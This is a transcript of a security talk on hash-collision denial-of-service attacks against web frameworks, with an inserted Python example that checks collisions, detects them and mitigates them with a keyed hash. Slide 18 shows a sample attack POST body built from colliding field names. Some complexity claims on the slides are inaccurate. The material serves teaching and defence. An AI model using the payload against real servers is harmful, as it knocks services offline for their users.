
Layer-7 DoS Hash Collisions


Presentation Transcript


  1. Layer-7 DoS Hash Collisions

  2. About Hybrid Security • Provide cyber fraud protection to websites • Prevent business logic attacks on web applications • Heuristic web user behavior analysis • Signature-free 0-day attack detection

  3. Layer-7 DoS • Slowloris: written by RSnake, exploits slow HTTP headers • R.U.Dead.Yet: written by Raviv Raz, exploits slow POST fields • Keep-Dead: written by Esrun, exploits long Keep-Alive sessions

  4. Hash DoS • HashDoS advisory published by Julian Wälde & Alexander Klink, Dec. 28, 2011 • Vulnerability in ASP.NET (MS11-100) • Vulnerability in PHP 4 and 5 • Also vulnerable: Java, Tomcat, Python, Ruby, Oracle

  5. Hash Tables [figure: the form fields login=root and passwd=123, each key mapped to its hash slot] • Insert, search, delete node with O(n) complexity

  6. Hash Collisions [figure: the fields EzEz=123, EzFY=123, FYEz=123, all keys mapped to the same hash slot] • When h(Ez) = h(FY)… • Insert, search, delete node become O(n²) complexity

  7. DJBX33A Hashing • Daniel J. Bernstein, 33 additions • Used in 32-bit PHP 5, Java Tomcat • Similar function used in Ruby

  8. Hashing With the Pigeons • Apparently, a non-injective function • More commonly known as the pigeonhole principle [figure: many strings mapping onto fewer hashes]

  9. DJBX33X Hashing • Daniel J. Bernstein, 33 XORs • Used in 32/64-bit PHP 4 & ASP.NET • Similar function used in Python

  10. Linear Collision Generation
      h('Ey') = 31¹·69 + 31⁰·121 = 2260
      h('FZ') = 31¹·70 + 31⁰·90 = 2260
      h('Eya') = 31·(31¹·69 + 31⁰·121) + 31⁰·97 = 31·(31¹·70 + 31⁰·90) + 31⁰·97 = h('FZa')

  11. DEMO

  12. Using Binary Permutations • h('EzEz') (00) = h('EzFY') (01) = h('FYEz') (10) = h('FYFY') (11)

  13. Pre-computing rainbow tables • Calculate long permutations of colliding char pairs • Create many same-hash field names for POST • More advanced Meet-In-The-Middle techniques improve rainbow table creation exponentially

  14. PHP 5 • DJBX33X • 1 Gbit/s of traffic keeps ~10,000 i7 CPU cores busy • POST size limited to 8 MB • POST limited by max_input_time (default on Ubuntu/BSD = 60 seconds)

  15. <?php echo $_POST["param"]; ?>

  16. DJBX33X • Breakable using Meet-In-The-Middle • 30 kbit/s keeps one Core 2 CPU busy • 1 Gbit/s keeps ~30,000 Core 2 CPUs busy

  17. <% Response.Write(Request.Form("param")) %>

  18. POST http://victim.com/
      Host: victim.com
      Connection: keep-alive
      Content-Length: 1000000
      User-Agent: Mozilla/5.0
      Cookie: __utmz=181569312.1294666144.1.1

      EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&…
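An added illustration, not part of the original slides, tying together the hash functions of slides 7 and 9, the collision arithmetic of slides 10 and 12, and the request body of slide 18: it checks that the slide 18 field names all land in one DJBX33A bucket, applies the collision-ratio heuristic a request filter could use to spot such a body, and shows a keyed hash as the mitigation. The seed 5381, the 32-bit truncation, the thresholds, the key and both request bodies are assumptions constructed for this example.

```python
import hashlib
from collections import Counter
from urllib.parse import unquote_to_bytes

MASK32 = 0xFFFFFFFF  # assumption: 32-bit hash words, as on 32-bit PHP 5

def djbx33a(s: bytes, seed: int = 5381, mult: int = 33) -> int:
    """DJBX33A ("times 33 and add"): h = h*33 + c, truncated to 32 bits.
    seed=0, mult=31 reproduces the Java-style arithmetic of slide 10."""
    h = seed
    for c in s:
        h = (h * mult + c) & MASK32
    return h

def djbx33x(s: bytes, seed: int = 5381) -> int:
    """DJBX33X ("times 33 and xor"), the PHP 4 / ASP.NET family: h = (h*33) ^ c."""
    h = seed
    for c in s:
        h = ((h * 33) ^ c) & MASK32
    return h

def keyed_hash(s: bytes, key: bytes = b"constructed-per-process-secret") -> int:
    """Keyed 32-bit hash (mitigation): colliding names cannot be precomputed without the key."""
    return int.from_bytes(hashlib.blake2b(s, key=key, digest_size=4).digest(), "big")

def form_field_names(body: bytes) -> list[bytes]:
    """Percent-decoded field names of an application/x-www-form-urlencoded body."""
    return [unquote_to_bytes(p.split(b"=", 1)[0]) for p in body.split(b"&") if p]

def collision_ratio(names: list[bytes], hash_fn=djbx33a) -> float:
    """Share of names in the single most crowded bucket: ~1/len(names) for a normal form, 1.0 for HashDoS."""
    if not names:
        return 0.0
    return max(Counter(hash_fn(n) for n in names).values()) / len(names)

def suspicious(body: bytes, threshold: float = 0.5, min_fields: int = 4) -> bool:
    """Request-filter heuristic (assumed thresholds): flag bodies whose field names mostly collide."""
    names = form_field_names(body)
    return len(names) >= min_fields and collision_ratio(names) >= threshold

# Constructed bodies: ATTACK_BODY uses the field names shown on slide 18.
ATTACK_BODY = b"EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&"
BENIGN_BODY = b"login=root&passwd=123&remember=1&lang=en"
```

Under DJBX33A every two-character pair with 33·c1 + c2 = 2399 (Ez, FY, G8, H\x17) hashes alike, and because the hash is linear in the prefix, any common prefix keeps them colliding, which is why the slide 18 names all fall into one bucket while the keyed hash scatters them.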

  19. PoC already in the wild

  20. Thank You raviv@hybridsec.com http://www.hybridsec.com
